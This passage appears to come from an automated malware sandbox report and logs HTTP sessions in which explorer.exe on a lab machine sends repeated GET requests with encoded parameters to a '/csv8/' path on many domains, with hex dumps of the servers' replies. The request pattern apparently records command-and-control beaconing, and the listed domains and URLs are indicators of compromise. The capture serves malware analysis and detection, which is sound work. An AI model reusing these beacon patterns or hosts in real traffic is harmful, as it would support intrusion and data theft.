2f 69 6d 67 2f 79 65 6c 6c 6f 77 2f 77 65 62 70 72 6f 2e 69 63 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 61 6c 65 77 61 79 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 42 2b 47 61 72 61 6d 6f 6e 64 3a 34 30 30 2c 35 30 30 2c 36 30 30 7c 52 61 6c 65 77 61 79 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 72 61 77 67 69 74 2e 63 6f 6d 2f 6f 70 65 6e 6c 61 79 65 72 73 2f 6f 70 65 6e 6c 61 79 65 72 73 2e 67 69 74 68 75 62 2e 69 6f 2f 6d 61 73 74 65 72 2f 65 6e 2f 76 35 2e 33
                                                                              Data Ascii: d7a<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <title>Aldana Snchez - Ingenieros Arquitectos | Arquitectos en Centro</title> <meta name="title" content="Aldana Snchez - Ingenieros Arquitectos | Arquitectos en Centro"> <meta name="author" content="Aldana Snchez - Ingenieros Arquitectos"> <meta name="robots" content="index,follow" /> <meta name="googlebot" content="index,follow" /> <link rel="shortcut icon" href="/static/new_templates/img/yellow/webpro.ico"> <link href="https://fonts.googleapis.com/css?family=Raleway:300,400,500,600,700,800" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=EB+Garamond:400,500,600|Raleway:300,400,500,600,700,800" rel="stylesheet"> <link href="https://cdn.rawgit.com/openlayers/openlayers.github.io/master/en/v5.3


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              15192.168.2.3497642.57.90.1680C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:55:20.494378090 CET4290OUTGET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.bhoomimart.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:55:20.551307917 CET4311INHTTP/1.1 404 Not Found
                                                                              Date: Wed, 13 Jan 2021 19:55:20 GMT
                                                                              Server: Apache
                                                                              Last-Modified: Tue, 15 Dec 2020 20:29:50 GMT
                                                                              ETag: "28ad-5b6869edbafe1"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 10413
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Cache-Control: max-age=63072000, public
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 34 2e 37 2e 30 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 61 6d 70 3b 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b
                                                                              Data Ascii: <!DOCTYPE html><html><head> <title>Parked Domain name on Hostinger DNS system</title> <meta charset="utf-8"> <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible"> <meta content="Parked Domain name on Hostinger DNS system" name="description"> <meta content="width=device-width, initial-scale=1" name="viewport"> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&amp;subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel="stylesheet"> <style> body {


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              16192.168.2.34977145.38.251.20480C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:55:25.758836985 CET4850OUTGET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.yyyut6.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:55:25.951215029 CET4852INHTTP/1.1 404 Not Found
                                                                              Content-Length: 1308
                                                                              Content-Type: text/html
                                                                              Server: Microsoft-IIS/6.0
                                                                              Date: Wed, 13 Jan 2021 19:55:15 GMT
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 47 42 32 33 31 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 68 31 3e 0d 0a c4 fa d5 fd d4 da cb d1 cb f7 b5 c4 d2 b3 c3 e6 bf c9 c4 dc d2 d1 be ad c9 be b3 fd a1 a2 b8 fc c3 fb bb f2 d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e c7 eb b3 a2 ca d4 d2 d4 cf c2 b2 d9 d7 f7 a3 ba 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e c8 b7 b1 a3 e4 af c0 c0 c6 f7 b5 c4 b5 d8 d6 b7 c0 b8 d6 d0 cf d4 ca be b5 c4 cd f8 d5 be b5 d8 d6 b7 b5 c4 c6 b4 d0 b4 ba cd b8 f1 ca bd d5 fd c8 b7 ce de ce f3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c8 e7 b9 fb cd a8 b9 fd b5 a5 bb f7 c1 b4 bd d3 b6 f8 b5 bd b4 ef c1 cb b8 c3 cd f8 d2 b3 a3 ac c7 eb d3 eb cd f8 d5 be b9 dc c0 ed d4 b1 c1 aa cf b5 a3 ac cd a8 d6 aa cb fb c3 c7 b8 c3 c1 b4 bd d3 b5 c4 b8 f1 ca bd b2 bb d5 fd c8 b7 a1 a3 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b5 a5 bb f7 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e ba f3 cd cb 3c 2f 61 3e b0 b4 c5 a5 b3 a2 ca d4 c1 ed d2 bb b8 f6 c1 b4 bd d3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 b4 ed ce f3 20 34 30 34 20 2d 20 ce c4 bc fe bb f2 c4 bf c2 bc ce b4 d5 d2 b5 bd a1 a3 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 d0 c5 cf a2 b7 fe ce f1 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e bc bc ca f5 d0 c5 cf a2 a3 a8 ce aa bc bc ca f5 d6 a7 b3 d6 c8 cb d4 b1 cc e1 b9 a9 a3 a9 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e d7 aa b5 bd 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 6c 69 6e 6b 69 64 3d 38 31 38 30 22 3e 4d 69 63 72 6f 73 6f 66 74 20 b2 fa c6 b7 d6 a7 b3 d6 b7 fe ce f1 3c 2f 61 3e b2 a2 cb d1 cb f7 b0 fc c0 a8 26 6c 64 71 75 6f 3b 48 54 54 50 26 72 64 71 75 6f 3b ba cd 26 6c 64 71 75 6f 3b 34 30 34 26 72 64 71 75 6f 3b b5 c4 b1 ea cc e2 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b4 f2 bf aa 26 6c 64 71 75 6f 3b 49 49 53 20 b0 ef d6 fa 26 72 64 71 75 6f 3b a3 a8 bf c9 d4 da 20 49 49 53 20 b9 dc c0 ed c6 f7 20 28 69 6e 65 74 6d 67 72 29 20 d6 d0 b7 c3 ce ca a3 a9 a3 ac c8 bb ba f3 cb d1 cb f7 b1 ea cc e2 ce aa 26 6c 64 71 75 6f 3b cd f8 d5 be c9 e8 d6 c3 26
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE></TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312"><STYLE type="text/css"> BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li></li><li></li><li><a href="javascript:history.back(1)"></a></li></ul><h2>HTTP 404 - <br>Internet (IIS)</h2><hr><p></p><ul><li> <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft </a>&ldquo;HTTP&rdquo;&ldquo;404&rdquo;</li><li>&ldquo;IIS &rdquo; IIS (inetmgr) &ldquo;&


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              17192.168.2.34977523.105.124.22580C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:55:31.377770901 CET5149OUTGET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.alparmuhendislik.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              18192.168.2.34977645.88.202.11580C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:55:42.599114895 CET5149OUTGET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.globepublishers.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:55:42.651582956 CET5150INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx
                                                                              Date: Wed, 13 Jan 2021 19:55:42 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 162
                                                                              Connection: close
                                                                              Location: https://www.globepublishers.com/csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              19192.168.2.349777216.10.246.13180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:55:47.808727980 CET5151OUTGET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.thedigitalsatyam.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:55:49.075298071 CET5151INHTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 13 Jan 2021 19:55:47 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              X-Redirect-By: WordPress
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Location: http://thedigitalsatyam.com/csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.349741149.202.23.21180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:53:41.840239048 CET804OUTGET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.aldanasanchezmx.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:53:41.937798977 CET806INHTTP/1.1 404 NOT FOUND
                                                                              Server: nginx
                                                                              Date: Wed, 13 Jan 2021 19:53:41 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Language: es-mx
                                                                              Vary: Accept-Language, Cookie
                                                                              Data Raw: 64 37 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 0a 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 20 7c 20 41 72 71 75 69 74 65 63 74 6f 73 20 65 6e 20 43 65 6e 74 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 20 7c 20 41 72 71 75 69 74 65 63 74 6f 73 20 65 6e 20 43 65 6e 74 72 6f 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 64 61 6e 61 20 53 c3 a1 6e 63 68 65 7a 20 2d 20 49 6e 67 65 6e 69 65 72 6f 73 20 41 72 71 75 69 74 65 63 74 6f 73 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2f 6e 65 77 5f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 67 2f 79 65 6c 6c 6f 77 2f 77 65 62 70 72 6f 2e 69 63 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 61 6c 65 77 61 79 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 42 2b 47 61 72 61 6d 6f 6e 64 3a 34 30 30 2c 35 30 30 2c 36 30 30 7c 52 61 6c 65 77 61 79 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 72 61 77 67 69 74 2e 63 6f 6d 2f 6f 70 65 6e 6c 61 79 65 72 73 2f 6f 70 65 6e 6c 61 79 65 72 73 2e 67 69 74 68 75 62 2e 69 6f 2f 6d 61 73 74 65 72 2f 65 6e 2f 76 35 2e 33
                                                                              Data Ascii: d7a<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content=""> <title>Aldana Snchez - Ingenieros Arquitectos | Arquitectos en Centro</title> <meta name="title" content="Aldana Snchez - Ingenieros Arquitectos | Arquitectos en Centro"> <meta name="author" content="Aldana Snchez - Ingenieros Arquitectos"> <meta name="robots" content="index,follow" /> <meta name="googlebot" content="index,follow" /> <link rel="shortcut icon" href="/static/new_templates/img/yellow/webpro.ico"> <link href="https://fonts.googleapis.com/css?family=Raleway:300,400,500,600,700,800" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=EB+Garamond:400,500,600|Raleway:300,400,500,600,700,800" rel="stylesheet"> <link href="https://cdn.rawgit.com/openlayers/openlayers.github.io/master/en/v5.3


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              20192.168.2.349778198.185.159.14480C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:56:00.296139956 CET5152OUTGET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.scheherazadelegault.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:56:00.471924067 CET5154INHTTP/1.1 400 Bad Request
                                                                              Cache-Control: no-cache, must-revalidate
                                                                              Content-Length: 77564
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 13 Jan 2021 19:56:00 UTC
                                                                              Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                              Pragma: no-cache
                                                                              Server: Squarespace
                                                                              X-Contextid: Ilem16kp/8NVFIhIC
                                                                              Connection: close
